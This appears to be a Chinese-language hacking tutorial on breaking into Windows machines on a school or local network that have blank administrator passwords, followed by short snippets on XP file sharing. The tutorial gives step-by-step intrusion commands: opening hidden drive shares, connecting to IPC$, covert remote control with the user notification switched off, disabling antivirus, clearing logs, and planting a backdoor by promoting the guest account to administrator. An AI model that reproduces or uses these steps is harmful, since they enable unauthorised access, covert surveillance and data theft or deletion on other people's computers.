1.入侵的範圍只包括區域網,如果在學校上,可以入侵整個校園網;
2.能入侵的只是存在弱口令(使用者名為administrator等,密碼為空),並且開了139埠,但沒開防火牆的機子。
入侵工具:
一般要用到三個:ntscan**掃瞄器,recton--d賀免殺專用版,dameware迷你中文版 4.5. (前兩個工具防毒軟體都會報毒,建議將防毒軟體實時防毒暫時關掉,並將這兩個軟體的壓縮包加密,防止被殺。)
入侵步驟:
1.使用"ntscan**掃瞄器",在ip處填上要掃瞄的ip範圍,選擇"wmi掃瞄"方式,按"開始"後就等掃瞄結果了。
2.使用"recton--d賀免殺專用版"
選擇"cmd命令"項,在"cmd:"中輸入"net share c$=c:/",即可開啟遠端主機的c盤共享,以此將"c"換成d,e,f等,即可開啟d盤,e盤,f盤等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對方主機上不會出現乙隻手托住盤的共享標誌,然後在位址列中輸入"//對方ip/c$",即可進入對方c盤。
選擇"telnet"項,在"遠端主機"中輸入剛才掃瞄到的乙個ip,遠端啟動telnet服務,成功後在"cmd選項"中,執行命令:"net share ipc$",接著執行:"net share admin$",最後執行"net use [url=file://***.***.***.***/ipc$]//***.***.***.***/ipc$[/url] "" /user:administrator"在*處填入你入侵的主機ip。
3.使用"dameware迷你中文版 4.5",安裝後點"dameware mini remote control",在"幫助"項中選擇啟用產品,輸入註冊資訊,成功註冊後,進入"遠端連線"視窗,在"主機"處填入ip位址,點"設定",在"服務安裝選項"中點"編輯"後,在"通知對話方塊"中去掉"連線時通知",在"附加設定"中全都不選,在"使用者選項"中去掉"啟用使用者選項選單"。設定完成好後,就可點"連線",在彈出的對話方塊中點"確定"後,成功後你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監視對方螢幕。 注意:如果不註冊的話,在對方主機上會彈出乙個對話方塊,暴露你的身份。
入侵步驟補充:
1.在以上第2步中,遠端啟動telnet服務可以通過"我的電腦-管理-連線到另一台計算機-輸入ip-服務和應用程式-服務-將telnet改為手動-啟動"完成。
2.recton--d賀免殺專用版還有其他功能,在"程序"項中,可以檢視遠端主機的程序,並可任意結束其中程序;在"共享"項中,可以建立共享,我常用的是建立c$,d$,e$,f$,共享路徑分別對應c:/,d:/等,共享好後在位址列中輸入"[url=file://ip/c$]//ip/c$[/url]",進入對方c盤,你就可以隨意複製刪除裡面的東西了,而且這種共享對方機子碟符上不會顯示共享圖示,也就不會被發現,弄完後最好還是把共享給關掉。最後選"日誌",清除所有日誌,不留痕跡。這個軟體會被防毒軟體當作病毒殺掉,用它時須將實時防毒關掉。
3.上面的共享可通過cmd(程式-附件-命令提示符)完成,首先"telnet ip",telnet上去,鍵入y後輸入的使用者名稱"administrator",密碼為空, 進入後,開共享用net share命令,共享c$(即c盤):"net share c$=c:",共享system資料夾:"net share c=c:/winnt/system32",共享ipc$用:"net share ipc$"等,最後是關閉共享,關閉c盤共享:"net share c$ /del"。
4.為方便下次入侵,可以設定後門, 檢視使用者:"net user",啟用guest使用者
"net user guest /active:yes",更改guest的密碼為poco:"net user guest poco",把guest的許可權提公升為管理員許可權:"net localgroup administrators guest /add"。
5.telnet命令(dos命令)很多,可去網上查詢它的命令,常用的有:檢視d盤檔案:""dir d:/",檢視c盤program file資料夾:"dir c:/progra~1/;",60秒倒記時關機:"shutdown -s -t 60"
補充說明:
1.net use錯誤原因解決:
(1)."發生系統錯誤 1326。 登入失敗: 未知的使用者名稱或錯誤密碼。"
在遠端機的"控制面板-資料夾選項-檢視-簡單的檔案共享",去掉選取,然後再嘗試連線。簡單檔案共享會把網路連線許可權都歸為 guest連線,是無法訪問c$等管理共享的.
(2)"發生系統錯誤 1327。 登陸失敗:使用者帳戶限制。可能的原因包括不允許空密碼,登陸時間限制,或強制的策略限。"在遠端機的"控制面板-管理工具-本地安全策略-安全選項-使用者許可權"指派裡,禁用"空密碼使用者只能進行控制台登陸".
(3)"//ip/c$"時提示找不到網路途徑。在"網路和撥號連線"中"本地連線"中選取"internet協議(tcp/ip)"屬性,進入"高階tcp/ip設定"選"wins設定"裡面有一項"啟用tcp/ip的netbios".
xp區域網共享連線方法
一 啟用guest來賓帳戶 二 控制面板 管理工具 本地安全策略 本地策略 使用者權利指派裡,從網路訪問此計算機 中加入guest帳戶,而 拒絕從網路訪問這台計算機 中刪除guest帳戶 三 我的電腦 工具 資料夾選項 檢視 去掉 使用簡單檔案共享 推薦 前的勾 四 設定共享資料夾 五 控制面板 管...
xp區域網共享設定
xp 在區域網內的每一台機子做以下一些設定 1 啟用guest 來賓 帳戶 控制面板 使用者帳戶或者在管理工具 計算機管理 本地使用者和組 右鍵guest屬性 去掉帳戶已停用 前的勾。2 允許guest 來賓 帳號從網路上訪問 開始 控制面板 管理工具 安全設定 本地安全策略 使用者權利指派 中的 ...
xp區域網共享設定
xp 在區域網內的每一台機子做以下一些設定 1 啟用guest 來賓 帳戶 控制面板 使用者帳戶或者在管理工具 計算機管理 本地使用者和組 右鍵guest屬性 去掉帳戶已停用 前的勾。2 允許guest 來賓 帳號從網路上訪問 開始 控制面板 管理工具 安全設定 本地安全策略 使用者權利指派 中的 ...